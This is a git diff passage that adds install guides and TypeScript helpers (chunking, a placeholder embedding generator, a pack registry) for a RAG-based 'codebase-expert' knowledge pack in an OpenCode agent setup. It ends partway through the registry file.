+ +## Validation Commands + +### Check Directory Structure + +```bash +find .opencode -type d | head -20 +``` + +### Validate JSON Files + +```bash +# opencode.json +python3 -c "import json; json.load(open('opencode.json'))" && echo "Valid JSON" + +# active-work.json +python3 -c "import json; json.load(open('.opencode/memory/state/active-work.json'))" && echo "Valid JSON" +``` + +### Check Skill Names + +```bash +# Should all be lowercase with hyphens +ls -1 .opencode/skill/ +``` + +### Verify Plugin Syntax + +```bash +# With the TypeScript compiler (via npm) +npx tsc --noEmit .opencode/plugin/*.ts + +# Or with bun +bunx tsc --noEmit .opencode/plugin/*.ts +``` + +## Success Criteria + +Installation is successful when: + +1. All directories exist +2. All core files are present +3. Files contain valid content +4. OpenCode starts without errors +5. Agent responds correctly to identity queries +6. Skills are discoverable and invokable +7. Plugins are loaded and functional +8. Memory read/write operations work +9. Security validator blocks dangerous commands + +## Troubleshooting + +### OpenCode Won't Start + +- Check `opencode.json` is valid JSON +- Verify plugin files have no syntax errors +- Check for conflicting configurations + +### Skills Not Found + +- Verify skill names are lowercase with hyphens +- Check SKILL.md has valid YAML frontmatter +- Ensure skill directories are in `.opencode/skill/` + +### Plugins Not Loading + +- Verify plugin exports default function +- Check plugin is enabled in `opencode.json` +- Look for TypeScript compilation errors + +### Memory Not Updating + +- Verify memory directory exists +- Check file permissions +- Ensure state files are valid JSON + +### Identity Not Loading + +- Verify AGENTS.md is in agent root (not in .opencode/) +- Check file permissions +- Ensure no syntax errors in markdown + +## Post-Verification + +Once verification passes: + +1. **Document completion** - Note installation date in config.yaml +2.
**Test knowledge packs** - Ready to install additional skills +3. **Customize as needed** - Add agent-specific context and skills +4. **Configure MCP servers** - Add external tool integrations + +## Installation Complete + +The OpenCode Cognitive Infrastructure is now installed and operational. + +The agent has: + +- Persistent memory across sessions +- Modular skill system with discovery +- Event-driven plugin automation +- Security validation on shell commands +- Complete identity configuration +- MCP integration capability + +### Next Steps + +1. Add **custom skills** for domain expertise +2. Configure **MCP servers** for external tools +3. Customize AGENTS.md with additional instructions +4. Add custom **plugins** for automation +5. Begin using the agent with full cognitive capabilities + +--- + +_OpenCode Cognitive Infrastructure v1.0.0_ diff --git a/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/0_INITIALIZE.md b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/0_INITIALIZE.md new file mode 100644 index 0000000..db23438 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/0_INITIALIZE.md @@ -0,0 +1,41 @@ +# Phase 0: Initialize + +## Objective + +Validate prerequisites for installing the codebase-expert knowledge pack. + +## Prerequisites Checklist + +### 1. OpenCode Cognitive Infrastructure + +Verify the agent has OpenCode Cognitive Infrastructure installed: + +- [ ] `.opencode/` directory exists +- [ ] `.opencode/skill/` directory exists +- [ ] `.opencode/memory/` directory exists +- [ ] `.opencode/VERSION` contains valid version + +### 2. Codebase Presence + +Verify there is a codebase to analyze: + +- [ ] Source code files exist in the agent directory +- [ ] At least one recognized language present (js, ts, py, go, etc.) + +### 3. 
Runtime Requirements + +Verify required tools are available: + +- [ ] Node.js (v18+) or Bun runtime +- [ ] npm available for dependencies + +## Validation Steps + +1. Check for `.opencode/` directory +2. Scan for source code files +3. Identify primary languages +4. Verify runtime availability + +## Next Phase + +Once prerequisites are validated, proceed to **1_ANALYZE.md**. diff --git a/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/1_ANALYZE.md b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/1_ANALYZE.md new file mode 100644 index 0000000..2672750 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/1_ANALYZE.md @@ -0,0 +1,59 @@ +# Phase 1: Analyze Codebase + +## Objective + +Analyze the codebase structure to plan optimal indexing strategy. + +## Analysis Tasks + +### 1. Directory Structure + +Map the codebase structure: + +- [ ] Identify source directories (src/, lib/, etc.) +- [ ] Locate test directories +- [ ] Find configuration files +- [ ] Note documentation locations + +### 2. Language Detection + +Identify languages and frameworks: + +| Extension | Language | Framework | +|-----------|----------|-----------| +| .ts, .tsx | TypeScript | | +| .js, .jsx | JavaScript | | +| .py | Python | | +| .go | Go | | +| .rs | Rust | | +| .java | Java | | + +### 3. File Inventory + +Count files by type: + +- Source files: ___ +- Test files: ___ +- Config files: ___ +- Documentation: ___ + +### 4. Key Entry Points + +Identify important files: + +- [ ] Main entry point(s) +- [ ] Package/module definition +- [ ] Primary exports +- [ ] API definitions + +## Analysis Outputs + +Document: +1. **Languages** - Primary and secondary languages +2. **Structure** - Directory organization pattern +3. **Size** - Total files and estimated tokens +4. **Entry Points** - Key files for understanding + +## Next Phase + +Proceed to **2_PLAN_STRUCTURE.md** to plan indexing structure. 
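
As an aid for the file-inventory task above, the counts can be gathered with `find`; the extensions and pruned paths below are examples to adapt to the detected languages. The sketch builds a throwaway sample tree so its counts are deterministic:

```shell
# File inventory sketch; tune extensions and pruned paths per codebase.
# Demonstrated on a throwaway tree so the counts are deterministic.
dir=$(mktemp -d)
mkdir -p "$dir/src" "$dir/node_modules"
touch "$dir/src/app.ts" "$dir/src/app.test.ts" "$dir/node_modules/dep.js" "$dir/README.md"

# Source files, skipping node_modules:
src_count=$(find "$dir" -path "$dir/node_modules" -prune -o -type f \
  \( -name '*.ts' -o -name '*.js' \) -print | wc -l)
echo "source files: $src_count"

# Documentation files:
doc_count=$(find "$dir" -type f -name '*.md' | wc -l)
echo "doc files: $doc_count"

rm -rf "$dir"
```

Run against the real codebase, replace `"$dir"` with `.` and extend the extension list for each detected language.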
diff --git a/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/2_PLAN_STRUCTURE.md b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/2_PLAN_STRUCTURE.md new file mode 100644 index 0000000..7b3d49e --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/2_PLAN_STRUCTURE.md @@ -0,0 +1,64 @@ +# Phase 2: Plan Structure + +## Objective + +Plan the indexing and installation structure for the codebase-expert pack. + +## Installation Structure + +``` +.opencode/ +├── skill/ +│ └── codebase-expert/ +│ └── SKILL.md # Skill definition +├── memory/ +│ └── knowledge/ +│ └── codebase/ +│ └── index.json # Codebase index metadata +├── plugin/ +│ └── lib/ +│ ├── embeddings.ts # Embedding generation +│ ├── vector-store.ts # Vector storage +│ └── chunking.ts # Document chunking +└── config/ + └── knowledge-packs.yaml # Registry entry +``` + +## Indexing Strategy + +### Files to Index + +Include: +- Source code files (.ts, .js, .py, .go, etc.) +- Configuration files (package.json, tsconfig.json, etc.) +- Documentation (.md files in docs/) + +Exclude: +- node_modules/ +- .git/ +- Build outputs (dist/, build/) +- Binary files +- Large generated files + +### Chunking Strategy + +- **Code files**: Chunk by function/class +- **Config files**: Keep whole +- **Documentation**: Chunk by section + +### Embedding Plan + +- Generate embeddings for each chunk +- Store in vector store for semantic search +- Index by file path and content type + +## Skill Configuration + +```yaml +name: codebase-expert +description: Deep expertise in the current codebase. USE WHEN user asks about code structure, architecture, implementations, or wants to find specific functionality. +``` + +## Next Phase + +Proceed to **3_EVALUATE.md** to evaluate the plan. 
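
The "chunk by function/class" strategy can be sketched with a simple line-based heuristic. This is illustrative only: it assumes top-level declarations start at column 0, and the pack's actual `chunking.ts` may instead use a real parser such as the TypeScript compiler API:

```typescript
// Minimal line-based chunker: starts a new chunk at each top-level
// function/class declaration. Illustrative sketch, not the shipped chunking.ts.
function chunkByDeclaration(source: string): string[] {
  const chunks: string[] = [];
  let current: string[] = [];
  for (const line of source.split("\n")) {
    const startsDecl = /^(export\s+)?(async\s+)?(function|class)\b/.test(line);
    if (startsDecl && current.length > 0) {
      chunks.push(current.join("\n"));
      current = [];
    }
    current.push(line);
  }
  if (current.length > 0) chunks.push(current.join("\n"));
  return chunks;
}

const sample = "function a() {}\nexport class B {}\n";
console.log(chunkByDeclaration(sample).length); // 2
```

A production chunker would also cap chunk size in tokens and attach file-path metadata to each chunk before embedding.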
diff --git a/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/3_EVALUATE.md b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/3_EVALUATE.md new file mode 100644 index 0000000..4b5840e --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/3_EVALUATE.md @@ -0,0 +1,58 @@ +# Phase 3: Evaluate Plan + +## Objective + +Evaluate the indexing plan for completeness and feasibility. + +## Evaluation Checklist + +### 1. Coverage + +- [ ] All relevant source directories included +- [ ] Important file types identified +- [ ] Exclusions are appropriate +- [ ] No sensitive files will be indexed + +### 2. Scale + +- [ ] File count is manageable +- [ ] Estimated token count within limits +- [ ] Chunking strategy appropriate for size + +### 3. Quality + +- [ ] Chunking preserves semantic meaning +- [ ] Key files prioritized +- [ ] Entry points well-covered + +### 4. Performance + +- [ ] Indexing can complete in reasonable time +- [ ] Vector store size is acceptable +- [ ] Search latency will be acceptable + +### 5. OpenCode Compatibility + +- [ ] Skill name follows lowercase-with-hyphens convention +- [ ] SKILL.md has valid YAML frontmatter +- [ ] Description under 1024 characters +- [ ] Plugin files export proper types + +## Risk Assessment + +| Risk | Likelihood | Mitigation | +|------|------------|------------| +| Too many files | Medium | Apply stricter exclusions | +| Poor chunk quality | Low | Adjust chunking strategy | +| Large embeddings | Low | Reduce chunk size | + +## Approval Criteria + +- [ ] Coverage is comprehensive +- [ ] Scale is manageable +- [ ] OpenCode naming conventions followed +- [ ] No blocking issues + +## Next Phase + +If evaluation passes, proceed to **4_IMPLEMENT.md**. 
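The Scale checks can be approximated numerically before indexing. A rough sketch, assuming the common ~4-characters-per-token heuristic and an illustrative 2M-token budget (both are assumptions to tune for your embedding provider):

```typescript
// Estimate total tokens from file sizes to sanity-check the "Scale" criteria.
function estimateTokens(totalChars: number, charsPerToken = 4): number {
  return Math.ceil(totalChars / charsPerToken);
}

function withinBudget(fileSizes: number[], tokenBudget = 2_000_000): boolean {
  const totalChars = fileSizes.reduce((sum, n) => sum + n, 0);
  return estimateTokens(totalChars) <= tokenBudget;
}

// 500 files averaging 8 KB is roughly 1M tokens: fits a 2M-token budget.
console.log(withinBudget(Array(500).fill(8_000))); // true
```

If the estimate exceeds the budget, apply stricter exclusions (the mitigation listed in the risk table) before proceeding.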
diff --git a/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/4_IMPLEMENT.md b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/4_IMPLEMENT.md new file mode 100644 index 0000000..ccb8f02 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/4_IMPLEMENT.md @@ -0,0 +1,184 @@ +# Phase 4: Implement Installation + +## Objective + +Execute the codebase-expert knowledge pack installation. + +--- + +## Prerequisites + +> **Important**: Before proceeding, you must configure an embedding provider. The default `embeddings.ts` contains placeholder code that returns random vectors. See the assets folder for the file to configure. + +### Embedding Provider Options + +1. **OpenAI** (recommended): Set `OPENAI_API_KEY` environment variable +2. **Ollama** (local): Run `ollama pull nomic-embed-text` +3. **Other**: Modify `{{AUTORUN_FOLDER}}/assets/lib/embeddings.ts` for your provider + +## Implementation Steps + +### Step 1: Create Skill Directory + +```bash +mkdir -p .opencode/skill/codebase-expert +``` + +### Step 2: Install SKILL.md + +Copy the skill template from `{{AUTORUN_FOLDER}}/assets/templates/skills/codebase-expert/SKILL.md` to: +`.opencode/skill/codebase-expert/SKILL.md` + +### Step 3: Create Knowledge Directory + +```bash +mkdir -p .opencode/memory/knowledge/codebase +``` + +### Step 4: Configure Embedding Provider + +Before indexing, update `{{AUTORUN_FOLDER}}/assets/lib/embeddings.ts` with your chosen provider: + +**For OpenAI:** +```typescript +import OpenAI from 'openai'; +const openai = new OpenAI({ apiKey: process.env.OPENAI_API_KEY }); + +export async function generateEmbedding(text: string): Promise<number[]> { + const response = await openai.embeddings.create({ + model: 'text-embedding-3-small', + input: text, + }); + return response.data[0].embedding; +} +``` + +**For Ollama (local):** +```typescript +export async function generateEmbedding(text: string): Promise<number[]> { + const response =

await fetch('http://localhost:11434/api/embeddings', { + method: 'POST', + body: JSON.stringify({ model: 'nomic-embed-text', prompt: text }), + }); + return (await response.json()).embedding; +} +``` + +### Step 5: Install Library Files + +Copy the library files from `{{AUTORUN_FOLDER}}/assets/lib/` to `.opencode/plugin/lib/`: + +```bash +mkdir -p .opencode/plugin/lib +cp {{AUTORUN_FOLDER}}/assets/lib/*.ts .opencode/plugin/lib/ +``` + +### Step 6: Index Codebase + +For each source file: +1. Read file content +2. Chunk appropriately (by function/class for code) +3. Generate embeddings using your configured provider +4. Store in vector store + +**Example indexing script** (import paths and `sourceFiles` are illustrative; the calls match the installed library APIs): + +```typescript +import { smartChunk } from './lib/chunking'; +import { generateEmbedding } from './lib/embeddings'; +import { VectorStore } from './lib/vector-store'; + +const store = VectorStore.forPack('codebase'); + +for (const file of sourceFiles) { + const chunks = smartChunk(file.content); + for (const chunk of chunks) { + const embedding = await generateEmbedding(chunk.content); + store.add({ + id: `${file.path}#${chunk.index}`, + content: chunk.content, + embedding, + metadata: { source: file.path }, + }); + } +} +``` + +### Step 7: Create Index Metadata + +Create `.opencode/memory/knowledge/codebase/index.json` (replace each `<placeholder>` with the actual value): + +```json +{ + "created": "<ISO timestamp>", + "files_indexed": <count>, + "chunks": <count>, + "languages": ["<language>", "<language>"], + "embedding_provider": "<provider>", + "embedding_model": "<model>", + "last_updated": "<ISO timestamp>" +} +``` + +### Step 8: Update Registry + +Create or update `.opencode/config/knowledge-packs.yaml`: + +```yaml +packs: + - id: codebase-expert + name: "Codebase Expert" + installed: "<ISO timestamp>" + version: "1.0.0" + embedding_provider: "<provider>" + sources: + - path: ".opencode/memory/knowledge/codebase/" + type: "directory" + skill_path: ".opencode/skill/codebase-expert/SKILL.md" +``` + +### Step 9: Create RAG Plugin (Optional) + +For automatic context injection, create `.opencode/plugin/rag-retrieval.ts`: + +```typescript +import type { Plugin } from
"@opencode-ai/plugin"; +import { VectorStore } from "./lib/vector-store"; +import { generateEmbedding } from "./lib/embeddings"; + +export const RagRetrieval: Plugin = async ({ client, $ }) => { + const store = new VectorStore('codebase'); + + return { + tool: { + execute: { + before: async (input, output) => { + // Extract query from user input if relevant + // Search vector store + // Inject context if matches found + } + } + } + }; +}; + +export default RagRetrieval; +``` + +--- + +## Post-Implementation + +- [ ] Verify all files created +- [ ] Test embedding generation with a sample query +- [ ] Verify vector store contains indexed chunks +- [ ] Test semantic search returns relevant results +- [ ] Skill name follows lowercase convention (`codebase-expert`) + +## Troubleshooting + +| Issue | Solution | +|-------|----------| +| Random/irrelevant results | Embedding provider not configured (still using placeholder) | +| API errors | Check API key and network connectivity | +| Empty results | Verify indexing completed and vector store has data | +| Skill not found | Check skill name is lowercase with hyphens | + +## Next Phase + +Proceed to **5_VERIFY.md** to verify installation. diff --git a/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/5_VERIFY.md b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/5_VERIFY.md new file mode 100644 index 0000000..2c69b01 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/5_VERIFY.md @@ -0,0 +1,117 @@ +# Phase 5: Verify Installation + +## Objective + +Verify the codebase-expert knowledge pack is correctly installed. + +## Verification Checklist + +### 1. Files Present + +- [ ] `.opencode/skill/codebase-expert/SKILL.md` exists +- [ ] `.opencode/memory/knowledge/codebase/` exists +- [ ] `.opencode/memory/knowledge/codebase/index.json` exists +- [ ] `.opencode/plugin/lib/` contains utility files + +### 2. 
Skill Configuration + +- [ ] SKILL.md has valid YAML frontmatter +- [ ] Name is lowercase (`codebase-expert`) +- [ ] Description contains `USE WHEN` trigger +- [ ] Description under 1024 characters + +### 3. Index Quality + +- [ ] Files were indexed +- [ ] Chunk count is reasonable +- [ ] Languages detected correctly + +### 4. Registry Entry + +- [ ] Pack is registered in knowledge-packs.yaml +- [ ] Sources path is correct +- [ ] Skill path is correct + +## Functional Testing + +### Test 1: Skill Discovery + +In OpenCode, ask: "What skills are available?" + +**Expected**: codebase-expert should appear in the list. + +### Test 2: Code Search + +Ask: "Where is the main entry point?" + +**Expected**: Agent finds and references the main entry file. + +### Test 3: Architecture + +Ask: "How is the project structured?" + +**Expected**: Agent describes directory structure and organization. + +### Test 4: Functionality + +Ask: "How does [specific feature] work?" + +**Expected**: Agent retrieves and explains relevant code. 
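The functional tests above can be complemented with a programmatic probe for the most common failure (placeholder embeddings still installed): a real provider returns identical vectors for identical input, while the placeholder returns fresh random vectors on every call. A sketch with stand-in embed functions (the real check would import `generateEmbedding` from `.opencode/plugin/lib/embeddings`):

```typescript
// Hedged sketch: detect whether generateEmbedding is still the random placeholder.
type EmbedFn = (text: string) => Promise<number[]>;

async function looksLikePlaceholder(embed: EmbedFn): Promise<boolean> {
  // Embed the same text twice; a deterministic provider yields equal vectors.
  const [a, b] = await Promise.all([embed('probe text'), embed('probe text')]);
  return a.some((v, i) => v !== b[i]);
}

// Demo with stand-ins instead of the real library import:
const fakeReal: EmbedFn = async (t) => [t.length, 0.5];      // deterministic
const fakePlaceholder: EmbedFn = async () => [Math.random()]; // random each call

console.log(await looksLikePlaceholder(fakeReal));        // false
console.log(await looksLikePlaceholder(fakePlaceholder)); // true
```

If the probe reports `true` against your installed `generateEmbedding`, revisit Step 4 of 4_IMPLEMENT.md before trusting any search results.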
+ +## Validation Commands + +### Check Skill Name + +```bash +# Should be lowercase with hyphens +ls -la .opencode/skill/ +``` + +### Verify SKILL.md Format + +```bash +# Check frontmatter +head -20 .opencode/skill/codebase-expert/SKILL.md +``` + +### Check Index + +```bash +cat .opencode/memory/knowledge/codebase/index.json +``` + +## Success Criteria + +- All files present +- Skill name follows OpenCode convention (lowercase-with-hyphens) +- Index populated +- Semantic search working +- Skill discoverable by OpenCode + +## Troubleshooting + +### Skill Not Found + +- Verify skill name is lowercase with hyphens +- Check SKILL.md has valid frontmatter +- Ensure `.opencode/skill/codebase-expert/SKILL.md` exists + +### No Search Results + +- Verify files were indexed +- Check embedding generation is configured +- Confirm vector store populated + +### Wrong Results + +- Review chunking strategy +- Check file exclusions +- Verify language detection + +## Installation Complete + +The codebase-expert knowledge pack is now installed. + +--- + +*codebase-expert Knowledge Pack v1.0.0* diff --git a/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/README.md b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/README.md new file mode 100644 index 0000000..f39cd3b --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/README.md @@ -0,0 +1,70 @@ +# codebase-expert Knowledge Pack + +Installs the codebase-expert knowledge pack, enabling RAG-powered code understanding with semantic search across the codebase. 
+ +## What This Pack Does + +The codebase-expert pack gives your agent deep understanding of your codebase: + +- **Semantic Code Search** - Find relevant code by meaning, not just keywords +- **Architecture Understanding** - Understand how components connect +- **Pattern Recognition** - Identify common patterns and conventions +- **Context-Aware Assistance** - Get help that understands your specific codebase + +## Prerequisites + +- OpenCode Cognitive Infrastructure must be installed first +- A codebase to analyze (the agent's working directory) + +## Installation + +Run this playbook after OpenCode Cognitive Infrastructure is set up. The playbook will: + +1. Analyze the codebase structure +2. Index code files for semantic search +3. Install the codebase-expert skill +4. Configure RAG retrieval plugin (optional) + +## After Installation + +The agent will automatically: +- Retrieve relevant code context when answering questions +- Understand the codebase architecture +- Reference specific files and functions in responses + +## Skill Triggers + +The codebase-expert skill activates on queries about: +- Code structure and architecture +- Finding specific functionality +- Understanding how components work +- Debugging and troubleshooting + +## Assets + +This playbook includes the following assets in the `assets/` folder: + +| Asset | Purpose | +|-------|---------| +| `lib/embeddings.ts` | Text embedding generation (placeholder - configure provider) | +| `lib/vector-store.ts` | Vector storage for semantic search | +| `lib/chunking.ts` | Document chunking strategies | +| `lib/registry.ts` | Knowledge pack registration | +| `templates/skills/codebase-expert/SKILL.md` | Skill definition template | + +Reference assets using `{{AUTORUN_FOLDER}}/assets/` in playbook documents. + +### Configuration Required + +The `embeddings.ts` file contains a **placeholder implementation**. You must configure an actual embedding provider (OpenAI, Ollama, etc.) for semantic search to work. 
See the file comments for configuration examples. + +## OpenCode-Specific Notes + +This pack follows OpenCode conventions: +- Skill name uses lowercase-with-hyphens (`codebase-expert`) +- Files install to `.opencode/skill/` and `.opencode/memory/` +- Plugins use TypeScript with `@opencode-ai/plugin` types + +--- + +*codebase-expert Knowledge Pack v1.0.0* diff --git a/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/lib/chunking.ts b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/lib/chunking.ts new file mode 100644 index 0000000..5446af2 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/lib/chunking.ts @@ -0,0 +1,199 @@ +/** + * Document Chunking + * + * Strategies for splitting documents into chunks for embedding. + */ + +interface Chunk { + content: string; + index: number; + metadata?: { + startLine?: number; + endLine?: number; + source?: string; + }; +} + +interface ChunkingOptions { + maxChunkSize?: number; + overlap?: number; + preserveParagraphs?: boolean; +} + +const defaultOptions: ChunkingOptions = { + maxChunkSize: 1000, + overlap: 100, + preserveParagraphs: true, +}; + +/** + * Split text into chunks by character count + */ +export function chunkBySize( + text: string, + options: ChunkingOptions = {} +): Chunk[] { + const { maxChunkSize, overlap } = { ...defaultOptions, ...options }; + const chunks: Chunk[] = []; + + let start = 0; + let index = 0; + + while (start < text.length) { + const end = Math.min(start + maxChunkSize!, text.length); + + chunks.push({ + content: text.slice(start, end), + index, + }); + + // Stop once the end of the text is reached; otherwise stepping back by + // `overlap` would re-emit the final chunk forever. + if (end === text.length) break; + + start = end - overlap!; + index++; + } + + return chunks; +} + +/** + * Split text into chunks by paragraph + */ +export function chunkByParagraph( + text: string, + options: ChunkingOptions = {} +): Chunk[] { + const { maxChunkSize } = { ...defaultOptions, ...options }; + const paragraphs = text.split(/\n\n+/); + const chunks: Chunk[]
= []; + + let currentChunk = ''; + let index = 0; + + for (const paragraph of paragraphs) { + if (currentChunk.length + paragraph.length > maxChunkSize!) { + if (currentChunk) { + chunks.push({ + content: currentChunk.trim(), + index, + }); + index++; + } + currentChunk = paragraph; + } else { + currentChunk += (currentChunk ? '\n\n' : '') + paragraph; + } + } + + if (currentChunk) { + chunks.push({ + content: currentChunk.trim(), + index, + }); + } + + return chunks; +} + +/** + * Split code into chunks by function/class + */ +export function chunkByCodeBlock( + code: string, + options: ChunkingOptions = {} +): Chunk[] { + const { maxChunkSize } = { ...defaultOptions, ...options }; + const chunks: Chunk[] = []; + + // Simple regex-based splitting for common patterns. + // Note: no `g` flag here -- `.test()` on a global regex is stateful + // (it advances lastIndex) and would skip alternating matches. + const patterns = [ + /^(export\s+)?(async\s+)?function\s+\w+/m, + /^(export\s+)?class\s+\w+/m, + /^(export\s+)?const\s+\w+\s*=/m, + ]; + + const lines = code.split('\n'); + let currentChunk: string[] = []; + let startLine = 0; + let index = 0; + + for (let i = 0; i < lines.length; i++) { + const line = lines[i]; + const isBlockStart = patterns.some(p => p.test(line)); + + if (isBlockStart && currentChunk.length > 0) { + const content = currentChunk.join('\n'); + if (content.trim()) { + chunks.push({ + content, + index, + metadata: { startLine, endLine: i - 1 }, + }); + index++; + } + currentChunk = []; + startLine = i; + } + + currentChunk.push(line); + + // Force split if chunk is too large + if (currentChunk.join('\n').length > maxChunkSize!)
{ + chunks.push({ + content: currentChunk.join('\n'), + index, + metadata: { startLine, endLine: i }, + }); + index++; + currentChunk = []; + startLine = i + 1; + } + } + + if (currentChunk.length > 0) { + const content = currentChunk.join('\n'); + if (content.trim()) { + chunks.push({ + content, + index, + metadata: { startLine, endLine: lines.length - 1 }, + }); + } + } + + return chunks; +} + +/** + * Smart chunking that detects content type + */ +export function smartChunk( + content: string, + options: ChunkingOptions = {} +): Chunk[] { + // Detect if content looks like code + const codeIndicators = [ + /^import\s+/m, + /^export\s+/m, + /function\s+\w+\s*\(/, + /class\s+\w+/, + /const\s+\w+\s*=/, + ]; + + const isCode = codeIndicators.some(p => p.test(content)); + + if (isCode) { + return chunkByCodeBlock(content, options); + } + + if (options.preserveParagraphs) { + return chunkByParagraph(content, options); + } + + return chunkBySize(content, options); +} + +export default { + chunkBySize, + chunkByParagraph, + chunkByCodeBlock, + smartChunk, +}; diff --git a/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/lib/embeddings.ts b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/lib/embeddings.ts new file mode 100644 index 0000000..4ab74e3 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/lib/embeddings.ts @@ -0,0 +1,118 @@ +/** + * Embeddings Generation + * + * Generates text embeddings for semantic search capabilities. + * + * ⚠️ CONFIGURATION REQUIRED ⚠️ + * + * This file contains a PLACEHOLDER implementation that returns random vectors. 
+ * You MUST replace generateEmbedding() with a real embedding provider: + * + * Option 1: OpenAI (recommended) + * ``` + * import OpenAI from 'openai'; + * const openai = new OpenAI({ apiKey: process.env.OPENAI_API_KEY }); + * + * export async function generateEmbedding(text: string): Promise<number[]> { + * const response = await openai.embeddings.create({ + * model: 'text-embedding-3-small', + * input: text, + * }); + * return response.data[0].embedding; + * } + * ``` + * + * Option 2: Ollama (local) + * ``` + * export async function generateEmbedding(text: string): Promise<number[]> { + * const response = await fetch('http://localhost:11434/api/embeddings', { + * method: 'POST', + * body: JSON.stringify({ model: 'nomic-embed-text', prompt: text }), + * }); + * return (await response.json()).embedding; + * } + * ``` + */ + +interface EmbeddingConfig { + model: string; + dimensions: number; + batchSize: number; +} + +const defaultConfig: EmbeddingConfig = { + model: 'text-embedding-3-small', + dimensions: 1536, + batchSize: 100, +}; + +/** + * Generate embedding for a single text + * + * ⚠️ PLACEHOLDER - Returns random vectors! + * Replace this function with a real embedding provider. + */ +export async function generateEmbedding( + text: string, + config: Partial<EmbeddingConfig> = {} +): Promise<number[]> { + const finalConfig = { ...defaultConfig, ...config }; + + // ⚠️ PLACEHOLDER IMPLEMENTATION - REPLACE ME! + // This returns random vectors which will NOT provide meaningful semantic search. + // See the file header comments for implementation examples. + console.warn( + '⚠️ embeddings.ts: Using placeholder implementation. ' + + 'Configure a real embedding provider for semantic search to work.'
+ ); + return new Array(finalConfig.dimensions).fill(0).map(() => Math.random()); +} + +/** + * Generate embeddings for multiple texts + */ +export async function generateEmbeddings( + texts: string[], + config: Partial<EmbeddingConfig> = {} +): Promise<number[][]> { + const finalConfig = { ...defaultConfig, ...config }; + const results: number[][] = []; + + // Process in batches + for (let i = 0; i < texts.length; i += finalConfig.batchSize) { + const batch = texts.slice(i, i + finalConfig.batchSize); + const batchResults = await Promise.all( + batch.map(text => generateEmbedding(text, config)) + ); + results.push(...batchResults); + } + + return results; +} + +/** + * Calculate cosine similarity between two embeddings + */ +export function cosineSimilarity(a: number[], b: number[]): number { + if (a.length !== b.length) { + throw new Error('Embeddings must have same dimensions'); + } + + let dotProduct = 0; + let normA = 0; + let normB = 0; + + for (let i = 0; i < a.length; i++) { + dotProduct += a[i] * b[i]; + normA += a[i] * a[i]; + normB += b[i] * b[i]; + } + + return dotProduct / (Math.sqrt(normA) * Math.sqrt(normB)); +} + +export default { + generateEmbedding, + generateEmbeddings, + cosineSimilarity, +}; diff --git a/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/lib/registry.ts b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/lib/registry.ts new file mode 100644 index 0000000..d7d9570 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/lib/registry.ts @@ -0,0 +1,114 @@ +/** + * Knowledge Pack Registry + * + * Manages registration and discovery of installed knowledge packs.
+ */ + +interface KnowledgePack { + id: string; + name: string; + version: string; + installed: string; + sources: Array<{ + path: string; + type: 'file' | 'directory' | 'embedded'; + }>; + skillPath?: string; + metadata?: Record<string, unknown>; +} + +interface RegistryConfig { + configPath: string; +} + +/** + * Singleton registry for knowledge packs + */ +export class Registry { + private static instance: Registry; + private packs: Map<string, KnowledgePack> = new Map(); + private configPath: string; + + private constructor(config: RegistryConfig) { + this.configPath = config.configPath; + } + + /** + * Get the singleton instance + */ + static getInstance(config?: RegistryConfig): Registry { + if (!Registry.instance) { + Registry.instance = new Registry(config || { + configPath: '.opencode/config/knowledge-packs.yaml' + }); + } + return Registry.instance; + } + + /** + * Register a new knowledge pack + */ + register(pack: KnowledgePack): void { + this.packs.set(pack.id, pack); + this.persist(); + } + + /** + * Unregister a knowledge pack + */ + unregister(packId: string): boolean { + const result = this.packs.delete(packId); + if (result) { + this.persist(); + } + return result; + } + + /** + * Get a specific pack by ID + */ + getPack(packId: string): KnowledgePack | undefined { + return this.packs.get(packId); + } + + /** + * Get all registered packs + */ + getAllPacks(): KnowledgePack[] { + return Array.from(this.packs.values()); + } + + /** + * Get active (non-disabled) packs + */ + getActivePacks(): KnowledgePack[] { + return this.getAllPacks().filter( + pack => pack.metadata?.disabled !== true + ); + } + + /** + * Check if a pack is installed + */ + isInstalled(packId: string): boolean { + return this.packs.has(packId); + } + + /** + * Load registry from config file + */ + async load(): Promise<void> { + // Implementation would read from YAML config + // 